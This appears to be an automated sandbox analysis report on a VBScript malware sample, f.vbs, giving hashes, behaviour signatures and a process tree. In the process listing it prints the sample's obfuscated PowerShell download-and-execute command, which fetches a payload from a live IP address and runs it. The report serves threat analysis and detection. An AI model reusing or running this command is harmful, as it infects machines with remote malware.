Analysis
max time kernel: 31s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 06-06-2023 18:26
Static task: static1
Behavioral task: behavioral1
Sample: f.vbs
Resource: win7-20230220-en (windows7-x64)
5 signatures
150 seconds
General
Target: f.vbs
Size: 346B
MD5: 41e54b45d2ab4718156a2d978aeb2eaa
SHA1: b8f924f1fd50d3feba999029615ae6d2b47ecea7
SHA256: eac03f7bc83d42d686c55a12736a74086e1feada3ef4181f79c5435311a5358d
SHA512: 96a51af6ebb69dc01971fef39a5e033417a02299080804a7062182f64be5b9c5ce0ac863397e34bfeca5a1b1c767883a4b6b3888e36e8f443ac0f1bb661e7727
Score: 8/10
Malware Config
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes:
    flow | pid  | process
    3    | 1932 | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid  | process
    1932 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description             | pid  | process
    Token: SeDebugPrivilege | 1932 | powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                       | pid  | process     | target process
    PID 2044 wrote to memory of 1932  | 2044 | WScript.exe | powershell.exe
    PID 2044 wrote to memory of 1932  | 2044 | WScript.exe | powershell.exe
    PID 2044 wrote to memory of 1932  | 2044 | WScript.exe | powershell.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of process 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');Sleep 1;IeX($s3+$kds+$HJDRRRUY);
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1932-58-0x000000001B050000-0x000000001B332000-memory.dmp (Filesize: 2.9MB)
- memory/1932-59-0x0000000002410000-0x0000000002418000-memory.dmp (Filesize: 32KB)
- memory/1932-60-0x0000000002510000-0x0000000002590000-memory.dmp (Filesize: 512KB)
- memory/1932-62-0x0000000002510000-0x0000000002590000-memory.dmp (Filesize: 512KB)
- memory/1932-61-0x0000000002510000-0x0000000002590000-memory.dmp (Filesize: 512KB)
- memory/1932-63-0x0000000002510000-0x0000000002590000-memory.dmp (Filesize: 512KB)